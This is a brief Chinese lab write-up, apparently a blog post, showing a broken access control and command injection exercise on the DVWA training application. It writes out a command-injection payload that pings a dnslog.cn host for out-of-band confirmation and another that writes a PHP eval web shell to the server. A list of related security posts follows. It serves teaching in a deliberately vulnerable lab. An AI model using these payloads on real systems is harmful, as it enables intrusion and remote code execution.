DVWA失效的访问控制

失效的访问控制,可以认为是系统对一些功能进行了访问或权限限制,但因为种种原因,限制并没有生效,造成失效的访问控制漏洞,比如越权等

这里以DVWA为例,先访问低难度的命令执行并抓包

删除cookie,并在请求头添加路径\dv\vulnerabilities\exec\source\low.php

因为没有回显,使用dnslog,ip=127.0.0.1%26ping+v0999s.2iknuw.dnslog.cn&Submit=Submit

这里还可以通过这个漏洞写入木马

ip=127.0.0.1%26echo+"<%3fphp+%40eval($_POST['cmd'])%3b%3f>">yc.php&Submit=Submit
相关推荐
星尘安全3 小时前
一种新的电子邮件攻击方式:AiTM
开发语言·网络安全·php·网络钓鱼·aitm
世界尽头与你3 小时前
安全热点问题
安全·网络安全
白帽黑客cst7 小时前
网络安全(黑客技术) 最新三个月学习计划
网络·数据结构·windows·学习·安全·web安全·网络安全
世界尽头与你9 小时前
活动目录安全
安全·网络安全·内网安全
anddddoooo9 小时前
vulnhub(11):derpnstink(hydra爆破用户名和密码、验证的文件上传)
linux·运维·服务器·安全·web安全·网络安全
web_learning_32110 小时前
网络安全证书考取相关知识
安全·web安全·网络安全
看山还是山,看水还是。10 小时前
《网络通信原理》
http·网络安全·智能路由器·信息与通信·信号处理
世界尽头与你13 小时前
移动应用安全
安全·网络安全
SRC_BLUE_1715 小时前
NISP 一级 | 8.2 打击网络违法犯罪相关法律法规
网络安全·nisp·证书获取
xuan哈哈哈1 天前
web基础—dvwa靶场(九)Weak Session IDs
web安全·网络安全